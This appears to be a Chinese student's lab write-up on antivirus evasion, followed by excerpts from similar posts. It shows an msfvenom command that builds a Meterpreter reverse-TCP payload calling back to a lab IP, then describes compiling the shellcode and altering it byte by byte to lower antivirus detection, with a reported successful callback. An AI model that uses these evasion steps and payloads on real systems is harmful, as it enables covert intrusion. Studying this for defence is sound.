20145320免殺原理與實踐

2022-03-12 20:55:36 字數 1620 閱讀 1008

(1)殺軟是如何檢測出惡意**的?

惡意**檢測方式

(3)免殺的基本方法有哪些?

但是當我第二次將這個後面軟體拖到桌面時,則被告知安全?!

雙擊發現並不能執行,看來還是沒有放過他。

同樣嘗試通過virscan.org來檢驗一下

從上圖可以看出,共有20款殺軟一針見血的指出了該程式為「木馬類」程式,但是其中並不包括360。(這應該是沒有更新360的版本的緣故,因為之前我在做實踐2的時候所使用的360防毒軟體也可以秒殺我的後面軟體,後來才換成了電腦管家)

接下來我們將針對殺軟如何判斷某個軟體是否為病毒的方法來打造我們的病毒!

生成過程這裡不再列舉,大家可以參照張薇同學的部落格

同樣使用我親愛的電腦管家看看:(win10下)

電腦管家

不愛了再用virscan.org檢測:

??我生成了假的**

再生成一次:

這還差不多。。

反而更多了乙個殺軟可以查殺了...

首先使用電腦管家看看

沒問題。。

再通過virscan.org看看:

依然有18款殺軟發現了這個後面軟體

在kali主機下,進入終端,執行指令:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.152.128 lport=8888 -f c > 5320shelldoor.c

將這個c檔案複製到主機用microsoft visual studio 2013進行編譯執行生成可執行檔案

virscan.org檢測結果如下:

只有7款殺軟體發現了!!

嘗試回連linux

成功了,這次操作的是我的帶著電腦管家的win10主機,桌面截圖如下:

這次嘗試對buf裡面的資料進行改動,這裡嘗試了按位取反:

還嘗試了逐位加1

真的大大縮小被查到的機率了!!

上述都是使用軟體生成木馬軟體,一般都被各大防毒軟體的病毒庫所收錄了,所以產生的木馬真的能產生作用的還是比較少,純手工打造的木馬我現在還只知道一些皮毛,離真正的實戰還很遠...而且我們生成的木馬現在是自己手動拖拽到主機裡面,要把這個木馬匯入到別人的電腦裡面肯定沒有這麼簡單,還要想方設法去製作一些陷阱,例如掛馬軟體。

通過這次實驗,我了解到了防毒軟體查殺的原理,知道原來防毒軟體也是這麼水的,也知道了惡意**是如何想盡辦法偽裝的;單純依賴查殺軟體或者防火牆是能完美保護我們的電腦主機的?不存在的絕對安全;

道高一尺魔高一丈,防毒與免殺就是在相互鬥爭之中不停的進步,只要網際網路還存在,防毒與免殺的鬥爭就無法停止;防毒軟體的薄弱在本次實踐中可見一斑,所以以後在網路中別隨意亂點不明鏈結,說不定就是同學製作的木馬...

Exp3 免殺原理與實踐

實驗做到中間的時候,在利用virustotal和virscan兩個平台上檢測時看到確實有不少殺軟做的不怎麼樣。實驗做到最後,發現確實我們對一些軟體進行加殼處理後殺軟也沒殺出來。分析殺軟檢測和免殺原理的時候確實感覺有種魔高一尺道高一丈的感覺 雖然這樣用詞不太準確 真正感覺到我們網路空間的安全性對於一般...

20145221高其 免殺原理與實踐

啟發式惡意軟體檢測 f prot是一款防毒軟體,有三個啟發引擎,可見其是比較強大的,但其誤報我也深感無能為力啊 後文會介紹 基於行為的惡意軟體檢測 改變行為 操作模式 其它方法 從上圖可以看出,許多殺軟一針見血的指出了該程式為 木馬類 程式 所以接下來要展現強大的免殺技術,順利讓我們的木馬潛入特洛伊...

20145332盧鑫 免殺原理與實踐

1 殺軟是如何檢測出惡意 的?答 為病毒的特徵設定乙個閾值,掃瞄器分析檔案時,當檔案的總權值超出了設定值,就將其看作是惡意 利用病毒的特有行為特徵來監測病毒 計算保留特徵碼,在遇到可以操作時進行比較,根據比較結果作出判斷 2 免殺是做什麼?答 是為了不讓病毒被識別出來,通過鑽防毒軟體漏洞或者將病毒偽...